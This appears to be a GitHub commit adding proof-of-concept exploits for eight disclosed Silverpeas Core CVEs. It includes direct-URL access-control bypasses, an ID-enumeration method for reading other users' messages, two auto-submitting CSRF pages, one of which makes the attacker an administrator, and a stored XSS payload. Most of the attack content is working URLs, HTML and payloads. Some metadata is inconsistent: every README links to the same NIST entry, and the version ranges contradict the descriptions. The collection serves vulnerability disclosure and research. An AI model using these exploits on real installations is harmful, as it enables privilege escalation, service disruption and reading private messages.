Skip to content

Commit 41f1563

Browse files
authored
Merge pull request #9 from TeneBrae93/master
Adding Silverpeas CVEs
2 parents f190ae0 + 20a6dc3 commit 41f1563

File tree

10 files changed

+159
-0
lines changed

10 files changed

+159
-0
lines changed

CVE-2023-47320/README.md

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
# CVE-2023-47320: Denial of Service via Broken Access Control in Silverpeas Core
2+
3+
## Information
4+
**Description:** This allows denial-of-service by a low privileged user affecting the Silverpeas Core application. <br>
5+
**Versions Affected:** < 6.3.1 <br>
6+
**Version Fixed:** 6.3.2 <br>
7+
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)
8+
**Disclosure Link:** https://rhinosecuritylabs.com/blog/
9+
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320
10+
11+
## Proof-of-Concept Exploit
12+
### Description
13+
Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control. An attacker with low privileges is able to execute the administrator-only function of putting the application in "Maintenance Mode" due to broken access control. This makes the application unavailable to all users.
14+
15+
### Usage/Exploitation
16+
After logging in as a low privileged user, go to this URL http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/ActivateMaintenance?allIntranet=1. This places the application in "Maintenance Mode" and makes it unavailable to all users.

CVE-2023-47321/README.md

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
# CVE-2023-47321: Portlet Deployer Access via Broken Access Control in Silverpeas Core
2+
3+
## Information
4+
**Description:** This allows low privileged users to access the Portlet Deployment tool. <br>
5+
**Versions Affected:** < 6.3.1 <br>
6+
**Version Fixed:** 6.3.2 <br>
7+
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)
8+
**Disclosure Link:** https://rhinosecuritylabs.com/blog/
9+
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320
10+
11+
## Proof-of-Concept Exploit
12+
### Description
13+
Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control via the "Portlet Deployet" which allows administrators to deploy .WAR portlets.
14+
15+
### Usage/Exploitation
16+
To exploit this vulnerability, an authenticated user needs to navigate directly to this URL: http://localhost:8080/silverpeas/portletDeployer.

CVE-2023-47322/CVE-2023-47322.html

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
<html>
2+
<body>
3+
<form action="http://localhost:8080/silverpeas/RjobDomainPeas/jsp/userModify">
4+
<input type="hidden" name="Iduser" value="[AttackersID]" />
5+
<input type="hidden" name="userLastName" value="[AttackersLastName]" />
6+
<input type="hidden" name="userAccessLevel" value="ADMINISTRATOR" />
7+
<input type="hidden" name="X&#45;STKN" value="[AttackersSTKNToken]" />
8+
<input type="submit" value="Submit request" />
9+
</form>
10+
<script>
11+
history.pushState('', '', '/');
12+
document.forms[0].submit();
13+
</script>
14+
</body>
15+
</html>

CVE-2023-47322/README.md

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
# CVE-2023-47322: CSRF Leading to Privilege Escalation in Silverpeas Core
2+
3+
## Information
4+
**Description:** The "userModify" request is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. <br>
5+
**Versions Affected:** < 6.3.1 <br>
6+
**Version Fixed:** 6.3.2 <br>
7+
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)
8+
**Disclosure Link:** https://rhinosecuritylabs.com/blog/
9+
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320
10+
11+
## Proof-of-Concept Exploit
12+
### Description
13+
The "userModify" feature of Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. If an administrator goes to a malicious URL while being authenticated to the Silverpeas application, the CSRF will execute making the attacker and administrator user in the application.
14+
15+
### Usage/Exploitation
16+
To exploit this vulnerability, an attacker must host ```CVE-2023-47322.html``` on an attacker-controlled web server. When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.
17+

CVE-2023-47323/README.md

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
# CVE-2023-47323: Broken Access Control Allows Reading All Messages in Silverpeas Core
2+
3+
## Information
4+
**Description:** The notification/messaging feature does not enforce access control on the ID parameter, allowing any user to read all messages (including admin-only messages). <br>
5+
**Versions Affected:** < 6.3.1 <br>
6+
**Version Fixed:** 6.3.2 <br>
7+
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)
8+
**Disclosure Link:** https://rhinosecuritylabs.com/blog/
9+
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320
10+
11+
## Proof-of-Concept Exploit
12+
### Description
13+
The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between other users; including those sent only to administrators.
14+
15+
### Usage/Exploitation
16+
To exploit this vulnerability, an attacker can use a script or Burp Suite Intruder to view all messages by attacking the ID parameter in this URL: http://localhost:8080/silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=[messageID] - the messages begin at "1" and increase in intervals of 1.

CVE-2023-47324/README.md

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
# CVE-2023-47324: Stored XSS in Messages affecting Silverpeas Core
2+
3+
## Information
4+
**Description:** The messaging feature of Silverpeas Core is vulnerable to Stored Cross-Site Scripting (XSS). <br>
5+
**Versions Affected:** < 6.3.1 <br>
6+
**Version Fixed:** 6.3.2 <br>
7+
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)
8+
**Disclosure Link:** https://rhinosecuritylabs.com/blog/
9+
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320
10+
11+
## Proof-of-Concept Exploit
12+
### Description
13+
The notification/messaging feature of Silverpeas Core 6.3.1 is vulnerable to Stored Cross-Site Scripting (XSS).
14+
15+
### Usage/Exploitation
16+
To exploit this vulnerability, the following payload can be sent in a message to another user: ```<img/src/onerror=prompt(1)>```. When the user opens it, it successfully executes Javascript in the user's browser.

CVE-2023-47325/README.md

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
# CVE-2023-47325: Broken Access Control on the "Bin" Allows Modification of Deleted Spaces in Silverpeas Core
2+
3+
## Information
4+
**Description:** Broken Access Control on the "Bin" allows low privileged users to access and modify deleted spaces in Silverpeas Core. <br>
5+
**Versions Affected:** < 6.3.1 <br>
6+
**Version Fixed:** 6.3.2 <br>
7+
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)
8+
**Disclosure Link:** https://rhinosecuritylabs.com/blog/
9+
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320
10+
11+
## Proof-of-Concept Exploit
12+
### Description
13+
The administrative "Bin" feature in Silverpeas Core 6.3.1 is affected by broken access control. A user with low privileges is able to navigate directly to the bin, revealing all deleted spaces. The user can then restore or permanently delete the spaces.
14+
15+
### Usage/Exploitation
16+
To exploit this vulnerability, an authenticated user needs to navigate directly to this URL: http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/ViewBin. The bin successfully renders revealing all deleted spaces. The low privileged user can then restore or permanently delete the spaces.

CVE-2023-47326/CVE-2023-47326.html

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
<html>
2+
<body>
3+
<form action="http://localhost:8080/silverpeas/RjobDomainPeas/jsp/domainSQLCreate">
4+
<input type="hidden" name="domainName" value="Created&#45;By&#45;CSRF" />
5+
<input type="hidden" name="domainDescription" value="" />
6+
<input type="hidden" name="silverpeasServerURL" value="http&#58;&#47;&#47;localhost&#58;8080&#47;silverpeas" />
7+
<input type="hidden" name="X&#45;STKN" value="[AttackerSTKNToken]" />
8+
<input type="submit" value="Submit request" />
9+
</form>
10+
<script>
11+
history.pushState('', '', '/');
12+
document.forms[0].submit();
13+
</script>
14+
</body>
15+
</html>

CVE-2023-47326/README.md

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
# CVE-2023-47326: Domain Creation is vulnerable to CSRF in Silverpeas Core
2+
3+
## Information
4+
**Description:** Silverpeas Core is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function. <br>
5+
**Versions Affected:** < 6.3.1 <br>
6+
**Version Fixed:** 6.3.2 <br>
7+
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)
8+
**Disclosure Link:** https://rhinosecuritylabs.com/blog/
9+
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320
10+
11+
## Proof-of-Concept Exploit
12+
### Description
13+
Silverpeas Core is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function. If an attacker clicks a malicious URL while authenticated to Silverpeas Core, the CSRF payload will create additional domains for authentication.
14+
15+
### Usage/Exploitation
16+
To exploit this vulnerability, an attacker must direct an administrator to a URL that loads the ```CVE-2023-47326.html``` file.

CVE-2023-47327/README.md

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
# CVE-2023-47327: The Space Create Function in Silverpeas Core is vulnerable to Broken Access Control
2+
3+
## Information
4+
**Description:** The "create a space" feature in Silverpeas Core suffers from broken access control, allowing any user to create a space regardless of permissions. <br>
5+
**Versions Affected:** < 6.3.1 <br>
6+
**Version Fixed:** 6.3.2 <br>
7+
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)
8+
**Disclosure Link:** https://rhinosecuritylabs.com/blog/
9+
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320
10+
11+
## Proof-of-Concept Exploit
12+
### Description
13+
The "create a space" feature in Silverpeas Core is reserved for administrator use. This feature suffers from Broken Access Control, allowing any authenticated user to create a space by navigating directly to the correct URL.
14+
15+
### Usage/Exploitation
16+
To exploit this vulnerability, an attacker with low privileges needs to navigate directly to this URL with their X-STKN token: http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/CreateSpace?X-STKN=[Users-STKN-Token]. The attacker can then type in a name and description and click "Ok" and the space is successfully created.

0 commit comments

Comments
 (0)